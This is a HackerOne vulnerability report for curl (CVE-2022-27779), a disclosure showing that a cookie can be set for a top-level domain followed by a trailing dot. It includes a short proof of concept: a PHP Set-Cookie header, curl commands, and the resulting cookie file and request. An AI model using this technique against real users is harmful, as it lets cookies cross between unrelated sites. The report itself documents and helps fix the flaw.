Lucene search

Haxatron1H1:1553301

HistoryApr 28, 2022 - 8:30 a.m.

curl: CVE-2022-27779: cookie for trailing dot TLD

2022-04-2808:30:28

haxatron1

hackerone.com

0.006 Low

EPSS

Percentile

77.8%

JSON

Summary:

In CVE-2014-3620 curl prevents cookies from being set for Top Level Domains (TLDs). According to the advisory, curl’s “cookie parser has no Public Suffix awareness”, but it will “reject TLDs from being allowed”. However, a cookie can still be set for a TLD + trailing dot.

A trailing dot after a TLD is considered legal and curl will send the http://example.com. to http://example.com

Steps To Reproduce:

Create an Apache file like the following

&lt;?php

header("Set-Cookie: a=b; Domain=.me.");

Now save the cookie to curl and see the cookie is set for .me.

curl -c cookies.txt http://localtest.me./index.php

cookies.txt:

# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

.me.    TRUE    /       FALSE   0       a       b

Requests sent via curl to the domain with TLD + ‘.’ will now contain the particular cookie.

curl -b cookies.txt http://domain.me./index.php

GET / HTTP/1.1
Host: domain.me.
User-Agent: curl/7.83.0
Accept: */*
Cookie: a=b

Impact

Cookies can be set by arbitrary sites for TLD + “.”, and if a trailing dot is used for an unrelated site, curl will send the cookie to the unrelated site.